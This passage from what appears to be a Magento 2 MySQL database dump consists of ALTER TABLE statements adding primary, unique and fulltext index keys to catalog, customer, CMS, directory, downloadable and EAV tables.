  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_TMP_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_TMP_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_TMP_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_price`
--
ALTER TABLE `catalog_product_index_price`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_MIN_PRICE` (`min_price`),
  ADD KEY `CAT_PRD_IDX_PRICE_WS_ID_CSTR_GROUP_ID_MIN_PRICE` (`website_id`,`customer_group_id`,`min_price`);

--
-- Indexes for table `catalog_product_index_price_bundle_idx`
--
ALTER TABLE `catalog_product_index_price_bundle_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_bundle_opt_idx`
--
ALTER TABLE `catalog_product_index_price_bundle_opt_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`,`option_id`);

--
-- Indexes for table `catalog_product_index_price_bundle_opt_tmp`
--
ALTER TABLE `catalog_product_index_price_bundle_opt_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`,`option_id`);

--
-- Indexes for table `catalog_product_index_price_bundle_sel_idx`
--
ALTER TABLE `catalog_product_index_price_bundle_sel_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`,`option_id`,`selection_id`);

--
-- Indexes for table `catalog_product_index_price_bundle_sel_tmp`
--
ALTER TABLE `catalog_product_index_price_bundle_sel_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`,`option_id`,`selection_id`);

--
-- Indexes for table `catalog_product_index_price_bundle_tmp`
--
ALTER TABLE `catalog_product_index_price_bundle_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_cfg_opt_agr_idx`
--
ALTER TABLE `catalog_product_index_price_cfg_opt_agr_idx`
  ADD PRIMARY KEY (`parent_id`,`child_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_cfg_opt_agr_tmp`
--
ALTER TABLE `catalog_product_index_price_cfg_opt_agr_tmp`
  ADD PRIMARY KEY (`parent_id`,`child_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_cfg_opt_idx`
--
ALTER TABLE `catalog_product_index_price_cfg_opt_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_cfg_opt_tmp`
--
ALTER TABLE `catalog_product_index_price_cfg_opt_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_downlod_idx`
--
ALTER TABLE `catalog_product_index_price_downlod_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_downlod_tmp`
--
ALTER TABLE `catalog_product_index_price_downlod_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_final_idx`
--
ALTER TABLE `catalog_product_index_price_final_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_final_tmp`
--
ALTER TABLE `catalog_product_index_price_final_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_idx`
--
ALTER TABLE `catalog_product_index_price_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_IDX_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_IDX_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_IDX_MIN_PRICE` (`min_price`);

--
-- Indexes for table `catalog_product_index_price_opt_agr_idx`
--
ALTER TABLE `catalog_product_index_price_opt_agr_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`,`option_id`);

--
-- Indexes for table `catalog_product_index_price_opt_agr_tmp`
--
ALTER TABLE `catalog_product_index_price_opt_agr_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`,`option_id`);

--
-- Indexes for table `catalog_product_index_price_opt_idx`
--
ALTER TABLE `catalog_product_index_price_opt_idx`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_opt_tmp`
--
ALTER TABLE `catalog_product_index_price_opt_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`);

--
-- Indexes for table `catalog_product_index_price_replica`
--
ALTER TABLE `catalog_product_index_price_replica`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_MIN_PRICE` (`min_price`),
  ADD KEY `CAT_PRD_IDX_PRICE_WS_ID_CSTR_GROUP_ID_MIN_PRICE` (`website_id`,`customer_group_id`,`min_price`);

--
-- Indexes for table `catalog_product_index_price_tmp`
--
ALTER TABLE `catalog_product_index_price_tmp`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_TMP_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_TMP_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_PRICE_TMP_MIN_PRICE` (`min_price`);

--
-- Indexes for table `catalog_product_index_tier_price`
--
ALTER TABLE `catalog_product_index_tier_price`
  ADD PRIMARY KEY (`entity_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_TIER_PRICE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_TIER_PRICE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalog_product_index_website`
--
ALTER TABLE `catalog_product_index_website`
  ADD PRIMARY KEY (`website_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_WEBSITE_WEBSITE_DATE` (`website_date`);

--
-- Indexes for table `catalog_product_link`
--
ALTER TABLE `catalog_product_link`
  ADD PRIMARY KEY (`link_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_LINK_LINK_TYPE_ID_PRODUCT_ID_LINKED_PRODUCT_ID` (`link_type_id`,`product_id`,`linked_product_id`),
  ADD KEY `CATALOG_PRODUCT_LINK_PRODUCT_ID` (`product_id`),
  ADD KEY `CATALOG_PRODUCT_LINK_LINKED_PRODUCT_ID` (`linked_product_id`);

--
-- Indexes for table `catalog_product_link_attribute`
--
ALTER TABLE `catalog_product_link_attribute`
  ADD PRIMARY KEY (`product_link_attribute_id`),
  ADD KEY `CATALOG_PRODUCT_LINK_ATTRIBUTE_LINK_TYPE_ID` (`link_type_id`);

--
-- Indexes for table `catalog_product_link_attribute_decimal`
--
ALTER TABLE `catalog_product_link_attribute_decimal`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CAT_PRD_LNK_ATTR_DEC_PRD_LNK_ATTR_ID_LNK_ID` (`product_link_attribute_id`,`link_id`),
  ADD KEY `CATALOG_PRODUCT_LINK_ATTRIBUTE_DECIMAL_LINK_ID` (`link_id`);

--
-- Indexes for table `catalog_product_link_attribute_int`
--
ALTER TABLE `catalog_product_link_attribute_int`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CAT_PRD_LNK_ATTR_INT_PRD_LNK_ATTR_ID_LNK_ID` (`product_link_attribute_id`,`link_id`),
  ADD KEY `CATALOG_PRODUCT_LINK_ATTRIBUTE_INT_LINK_ID` (`link_id`);

--
-- Indexes for table `catalog_product_link_attribute_varchar`
--
ALTER TABLE `catalog_product_link_attribute_varchar`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CAT_PRD_LNK_ATTR_VCHR_PRD_LNK_ATTR_ID_LNK_ID` (`product_link_attribute_id`,`link_id`),
  ADD KEY `CATALOG_PRODUCT_LINK_ATTRIBUTE_VARCHAR_LINK_ID` (`link_id`);

--
-- Indexes for table `catalog_product_link_type`
--
ALTER TABLE `catalog_product_link_type`
  ADD PRIMARY KEY (`link_type_id`);

--
-- Indexes for table `catalog_product_option`
--
ALTER TABLE `catalog_product_option`
  ADD PRIMARY KEY (`option_id`),
  ADD KEY `CATALOG_PRODUCT_OPTION_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalog_product_option_price`
--
ALTER TABLE `catalog_product_option_price`
  ADD PRIMARY KEY (`option_price_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_OPTION_PRICE_OPTION_ID_STORE_ID` (`option_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_OPTION_PRICE_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_option_title`
--
ALTER TABLE `catalog_product_option_title`
  ADD PRIMARY KEY (`option_title_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_OPTION_TITLE_OPTION_ID_STORE_ID` (`option_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_OPTION_TITLE_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_option_type_price`
--
ALTER TABLE `catalog_product_option_type_price`
  ADD PRIMARY KEY (`option_type_price_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_OPTION_TYPE_PRICE_OPTION_TYPE_ID_STORE_ID` (`option_type_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_OPTION_TYPE_PRICE_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_option_type_title`
--
ALTER TABLE `catalog_product_option_type_title`
  ADD PRIMARY KEY (`option_type_title_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_OPTION_TYPE_TITLE_OPTION_TYPE_ID_STORE_ID` (`option_type_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_OPTION_TYPE_TITLE_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_option_type_value`
--
ALTER TABLE `catalog_product_option_type_value`
  ADD PRIMARY KEY (`option_type_id`),
  ADD KEY `CATALOG_PRODUCT_OPTION_TYPE_VALUE_OPTION_ID` (`option_id`);

--
-- Indexes for table `catalog_product_relation`
--
ALTER TABLE `catalog_product_relation`
  ADD PRIMARY KEY (`parent_id`,`child_id`),
  ADD KEY `CATALOG_PRODUCT_RELATION_CHILD_ID` (`child_id`);

--
-- Indexes for table `catalog_product_super_attribute`
--
ALTER TABLE `catalog_product_super_attribute`
  ADD PRIMARY KEY (`product_super_attribute_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_SUPER_ATTRIBUTE_PRODUCT_ID_ATTRIBUTE_ID` (`product_id`,`attribute_id`);

--
-- Indexes for table `catalog_product_super_attribute_label`
--
ALTER TABLE `catalog_product_super_attribute_label`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CAT_PRD_SPR_ATTR_LBL_PRD_SPR_ATTR_ID_STORE_ID` (`product_super_attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_SUPER_ATTRIBUTE_LABEL_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_super_link`
--
ALTER TABLE `catalog_product_super_link`
  ADD PRIMARY KEY (`link_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_SUPER_LINK_PRODUCT_ID_PARENT_ID` (`product_id`,`parent_id`),
  ADD KEY `CATALOG_PRODUCT_SUPER_LINK_PARENT_ID` (`parent_id`);

--
-- Indexes for table `catalog_product_website`
--
ALTER TABLE `catalog_product_website`
  ADD PRIMARY KEY (`product_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_WEBSITE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalog_url_rewrite_product_category`
--
ALTER TABLE `catalog_url_rewrite_product_category`
  ADD KEY `CAT_URL_REWRITE_PRD_CTGR_PRD_ID_CAT_PRD_ENTT_ENTT_ID` (`product_id`),
  ADD KEY `FK_BB79E64705D7F17FE181F23144528FC8` (`url_rewrite_id`),
  ADD KEY `CATALOG_URL_REWRITE_PRODUCT_CATEGORY_CATEGORY_ID_PRODUCT_ID` (`category_id`,`product_id`);

--
-- Indexes for table `checkout_agreement`
--
ALTER TABLE `checkout_agreement`
  ADD PRIMARY KEY (`agreement_id`);

--
-- Indexes for table `checkout_agreement_store`
--
ALTER TABLE `checkout_agreement_store`
  ADD PRIMARY KEY (`agreement_id`,`store_id`),
  ADD KEY `CHECKOUT_AGREEMENT_STORE_STORE_ID_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `cms_block`
--
ALTER TABLE `cms_block`
  ADD PRIMARY KEY (`block_id`);
ALTER TABLE `cms_block` ADD FULLTEXT KEY `CMS_BLOCK_TITLE_IDENTIFIER_CONTENT` (`title`,`identifier`,`content`);

--
-- Indexes for table `cms_block_store`
--
ALTER TABLE `cms_block_store`
  ADD PRIMARY KEY (`block_id`,`store_id`),
  ADD KEY `CMS_BLOCK_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `cms_page`
--
ALTER TABLE `cms_page`
  ADD PRIMARY KEY (`page_id`),
  ADD KEY `CMS_PAGE_IDENTIFIER` (`identifier`);
ALTER TABLE `cms_page` ADD FULLTEXT KEY `CMS_PAGE_TITLE_META_KEYWORDS_META_DESCRIPTION_IDENTIFIER_CONTENT` (`title`,`meta_keywords`,`meta_description`,`identifier`,`content`);

--
-- Indexes for table `cms_page_store`
--
ALTER TABLE `cms_page_store`
  ADD PRIMARY KEY (`page_id`,`store_id`),
  ADD KEY `CMS_PAGE_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `core_config_data`
--
ALTER TABLE `core_config_data`
  ADD PRIMARY KEY (`config_id`),
  ADD UNIQUE KEY `CORE_CONFIG_DATA_SCOPE_SCOPE_ID_PATH` (`scope`,`scope_id`,`path`);

--
-- Indexes for table `cron_schedule`
--
ALTER TABLE `cron_schedule`
  ADD PRIMARY KEY (`schedule_id`),
  ADD KEY `CRON_SCHEDULE_JOB_CODE` (`job_code`),
  ADD KEY `CRON_SCHEDULE_SCHEDULED_AT_STATUS` (`scheduled_at`,`status`);

--
-- Indexes for table `customer_address_entity`
--
ALTER TABLE `customer_address_entity`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_PARENT_ID` (`parent_id`);

--
-- Indexes for table `customer_address_entity_datetime`
--
ALTER TABLE `customer_address_entity_datetime`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ADDRESS_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_DATETIME_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_address_entity_decimal`
--
ALTER TABLE `customer_address_entity_decimal`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ADDRESS_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_DECIMAL_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_address_entity_int`
--
ALTER TABLE `customer_address_entity_int`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ADDRESS_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_INT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_address_entity_text`
--
ALTER TABLE `customer_address_entity_text`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ADDRESS_ENTITY_TEXT_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_TEXT_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `customer_address_entity_varchar`
--
ALTER TABLE `customer_address_entity_varchar`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ADDRESS_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_VARCHAR_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ADDRESS_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_eav_attribute`
--
ALTER TABLE `customer_eav_attribute`
  ADD PRIMARY KEY (`attribute_id`);

--
-- Indexes for table `customer_eav_attribute_website`
--
ALTER TABLE `customer_eav_attribute_website`
  ADD PRIMARY KEY (`attribute_id`,`website_id`),
  ADD KEY `CUSTOMER_EAV_ATTRIBUTE_WEBSITE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `customer_entity`
--
ALTER TABLE `customer_entity`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `CUSTOMER_ENTITY_EMAIL_WEBSITE_ID` (`email`,`website_id`),
  ADD KEY `CUSTOMER_ENTITY_STORE_ID` (`store_id`),
  ADD KEY `CUSTOMER_ENTITY_WEBSITE_ID` (`website_id`),
  ADD KEY `CUSTOMER_ENTITY_FIRSTNAME` (`firstname`),
  ADD KEY `CUSTOMER_ENTITY_LASTNAME` (`lastname`);

--
-- Indexes for table `customer_entity_datetime`
--
ALTER TABLE `customer_entity_datetime`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_DATETIME_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_entity_decimal`
--
ALTER TABLE `customer_entity_decimal`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_DECIMAL_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_entity_int`
--
ALTER TABLE `customer_entity_int`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_INT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_entity_text`
--
ALTER TABLE `customer_entity_text`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ENTITY_TEXT_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_TEXT_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `customer_entity_varchar`
--
ALTER TABLE `customer_entity_varchar`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CUSTOMER_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID` (`entity_id`,`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_VARCHAR_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CUSTOMER_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID_VALUE` (`entity_id`,`attribute_id`,`value`);

--
-- Indexes for table `customer_form_attribute`
--
ALTER TABLE `customer_form_attribute`
  ADD PRIMARY KEY (`form_code`,`attribute_id`),
  ADD KEY `CUSTOMER_FORM_ATTRIBUTE_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `customer_grid_flat`
--
ALTER TABLE `customer_grid_flat`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `CUSTOMER_GRID_FLAT_GROUP_ID` (`group_id`),
  ADD KEY `CUSTOMER_GRID_FLAT_CREATED_AT` (`created_at`),
  ADD KEY `CUSTOMER_GRID_FLAT_WEBSITE_ID` (`website_id`),
  ADD KEY `CUSTOMER_GRID_FLAT_CONFIRMATION` (`confirmation`),
  ADD KEY `CUSTOMER_GRID_FLAT_DOB` (`dob`),
  ADD KEY `CUSTOMER_GRID_FLAT_GENDER` (`gender`),
  ADD KEY `CUSTOMER_GRID_FLAT_BILLING_COUNTRY_ID` (`billing_country_id`);
ALTER TABLE `customer_grid_flat` ADD FULLTEXT KEY `FTI_8746F705702DD5F6D45B8C7CE7FE9F2F` (`name`,`email`,`created_in`,`taxvat`,`shipping_full`,`billing_full`,`billing_firstname`,`billing_lastname`,`billing_telephone`,`billing_postcode`,`billing_region`,`billing_city`,`billing_fax`,`billing_company`);

--
-- Indexes for table `customer_group`
--
ALTER TABLE `customer_group`
  ADD PRIMARY KEY (`customer_group_id`);

--
-- Indexes for table `customer_log`
--
ALTER TABLE `customer_log`
  ADD PRIMARY KEY (`log_id`),
  ADD UNIQUE KEY `CUSTOMER_LOG_CUSTOMER_ID` (`customer_id`);

--
-- Indexes for table `customer_visitor`
--
ALTER TABLE `customer_visitor`
  ADD PRIMARY KEY (`visitor_id`),
  ADD KEY `CUSTOMER_VISITOR_CUSTOMER_ID` (`customer_id`),
  ADD KEY `CUSTOMER_VISITOR_LAST_VISIT_AT` (`last_visit_at`);

--
-- Indexes for table `design_change`
--
ALTER TABLE `design_change`
  ADD PRIMARY KEY (`design_change_id`),
  ADD KEY `DESIGN_CHANGE_STORE_ID` (`store_id`);

--
-- Indexes for table `design_config_grid_flat`
--
ALTER TABLE `design_config_grid_flat`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `DESIGN_CONFIG_GRID_FLAT_STORE_WEBSITE_ID` (`store_website_id`),
  ADD KEY `DESIGN_CONFIG_GRID_FLAT_STORE_GROUP_ID` (`store_group_id`),
  ADD KEY `DESIGN_CONFIG_GRID_FLAT_STORE_ID` (`store_id`);
ALTER TABLE `design_config_grid_flat` ADD FULLTEXT KEY `DESIGN_CONFIG_GRID_FLAT_THEME_THEME_ID` (`theme_theme_id`);

--
-- Indexes for table `directory_country`
--
ALTER TABLE `directory_country`
  ADD PRIMARY KEY (`country_id`);

--
-- Indexes for table `directory_country_format`
--
ALTER TABLE `directory_country_format`
  ADD PRIMARY KEY (`country_format_id`),
  ADD UNIQUE KEY `DIRECTORY_COUNTRY_FORMAT_COUNTRY_ID_TYPE` (`country_id`,`type`);

--
-- Indexes for table `directory_country_region`
--
ALTER TABLE `directory_country_region`
  ADD PRIMARY KEY (`region_id`),
  ADD KEY `DIRECTORY_COUNTRY_REGION_COUNTRY_ID` (`country_id`);

--
-- Indexes for table `directory_country_region_name`
--
ALTER TABLE `directory_country_region_name`
  ADD PRIMARY KEY (`locale`,`region_id`),
  ADD KEY `DIRECTORY_COUNTRY_REGION_NAME_REGION_ID` (`region_id`);

--
-- Indexes for table `directory_currency_rate`
--
ALTER TABLE `directory_currency_rate`
  ADD PRIMARY KEY (`currency_from`,`currency_to`),
  ADD KEY `DIRECTORY_CURRENCY_RATE_CURRENCY_TO` (`currency_to`);

--
-- Indexes for table `downloadable_link`
--
ALTER TABLE `downloadable_link`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `DOWNLOADABLE_LINK_PRODUCT_ID_SORT_ORDER` (`product_id`,`sort_order`);

--
-- Indexes for table `downloadable_link_price`
--
ALTER TABLE `downloadable_link_price`
  ADD PRIMARY KEY (`price_id`),
  ADD KEY `DOWNLOADABLE_LINK_PRICE_LINK_ID` (`link_id`),
  ADD KEY `DOWNLOADABLE_LINK_PRICE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `downloadable_link_purchased`
--
ALTER TABLE `downloadable_link_purchased`
  ADD PRIMARY KEY (`purchased_id`),
  ADD KEY `DOWNLOADABLE_LINK_PURCHASED_ORDER_ID` (`order_id`),
  ADD KEY `DOWNLOADABLE_LINK_PURCHASED_ORDER_ITEM_ID` (`order_item_id`),
  ADD KEY `DOWNLOADABLE_LINK_PURCHASED_CUSTOMER_ID` (`customer_id`);

--
-- Indexes for table `downloadable_link_purchased_item`
--
ALTER TABLE `downloadable_link_purchased_item`
  ADD PRIMARY KEY (`item_id`),
  ADD KEY `DOWNLOADABLE_LINK_PURCHASED_ITEM_LINK_HASH` (`link_hash`),
  ADD KEY `DOWNLOADABLE_LINK_PURCHASED_ITEM_ORDER_ITEM_ID` (`order_item_id`),
  ADD KEY `DOWNLOADABLE_LINK_PURCHASED_ITEM_PURCHASED_ID` (`purchased_id`);

--
-- Indexes for table `downloadable_link_title`
--
ALTER TABLE `downloadable_link_title`
  ADD PRIMARY KEY (`title_id`),
  ADD UNIQUE KEY `DOWNLOADABLE_LINK_TITLE_LINK_ID_STORE_ID` (`link_id`,`store_id`),
  ADD KEY `DOWNLOADABLE_LINK_TITLE_STORE_ID` (`store_id`);

--
-- Indexes for table `downloadable_sample`
--
ALTER TABLE `downloadable_sample`
  ADD PRIMARY KEY (`sample_id`),
  ADD KEY `DOWNLOADABLE_SAMPLE_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `downloadable_sample_title`
--
ALTER TABLE `downloadable_sample_title`
  ADD PRIMARY KEY (`title_id`),
  ADD UNIQUE KEY `DOWNLOADABLE_SAMPLE_TITLE_SAMPLE_ID_STORE_ID` (`sample_id`,`store_id`),
  ADD KEY `DOWNLOADABLE_SAMPLE_TITLE_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_attribute`
--
ALTER TABLE `eav_attribute`
  ADD PRIMARY KEY (`attribute_id`),
  ADD UNIQUE KEY `EAV_ATTRIBUTE_ENTITY_TYPE_ID_ATTRIBUTE_CODE` (`entity_type_id`,`attribute_code`);

--
-- Indexes for table `eav_attribute_group`
--
ALTER TABLE `eav_attribute_group`
  ADD PRIMARY KEY (`attribute_group_id`),
  ADD UNIQUE KEY `EAV_ATTRIBUTE_GROUP_ATTRIBUTE_SET_ID_ATTRIBUTE_GROUP_CODE` (`attribute_set_id`,`attribute_group_code`),
  ADD UNIQUE KEY `EAV_ATTRIBUTE_GROUP_ATTRIBUTE_SET_ID_ATTRIBUTE_GROUP_NAME` (`attribute_set_id`,`attribute_group_name`),
  ADD KEY `EAV_ATTRIBUTE_GROUP_ATTRIBUTE_SET_ID_SORT_ORDER` (`attribute_set_id`,`sort_order`);

--
-- Indexes for table `eav_attribute_label`
--
ALTER TABLE `eav_attribute_label`
  ADD PRIMARY KEY (`attribute_label_id`),
  ADD KEY `EAV_ATTRIBUTE_LABEL_STORE_ID` (`store_id`),
  ADD KEY `EAV_ATTRIBUTE_LABEL_ATTRIBUTE_ID_STORE_ID` (`attribute_id`,`store_id`);

--
-- Indexes for table `eav_attribute_option`
--
ALTER TABLE `eav_attribute_option`
  ADD PRIMARY KEY (`option_id`),
  ADD KEY `EAV_ATTRIBUTE_OPTION_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `eav_attribute_option_swatch`
--
ALTER TABLE `eav_attribute_option_swatch`
  ADD PRIMARY KEY (`swatch_id`),
  ADD UNIQUE KEY `EAV_ATTRIBUTE_OPTION_SWATCH_STORE_ID_OPTION_ID` (`store_id`,`option_id`),
  ADD KEY `EAV_ATTR_OPT_SWATCH_OPT_ID_EAV_ATTR_OPT_OPT_ID` (`option_id`),
  ADD KEY `EAV_ATTRIBUTE_OPTION_SWATCH_SWATCH_ID` (`swatch_id`);

--
-- Indexes for table `eav_attribute_option_value`
--
ALTER TABLE `eav_attribute_option_value`
  ADD PRIMARY KEY (`value_id`),
  ADD KEY `EAV_ATTRIBUTE_OPTION_VALUE_OPTION_ID` (`option_id`),
  ADD KEY `EAV_ATTRIBUTE_OPTION_VALUE_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_attribute_set`
--
ALTER TABLE `eav_attribute_set`
  ADD PRIMARY KEY (`attribute_set_id`),
  ADD UNIQUE KEY `EAV_ATTRIBUTE_SET_ENTITY_TYPE_ID_ATTRIBUTE_SET_NAME` (`entity_type_id`,`attribute_set_name`),
  ADD KEY `EAV_ATTRIBUTE_SET_ENTITY_TYPE_ID_SORT_ORDER` (`entity_type_id`,`sort_order`);

--
-- Indexes for table `eav_entity`
--
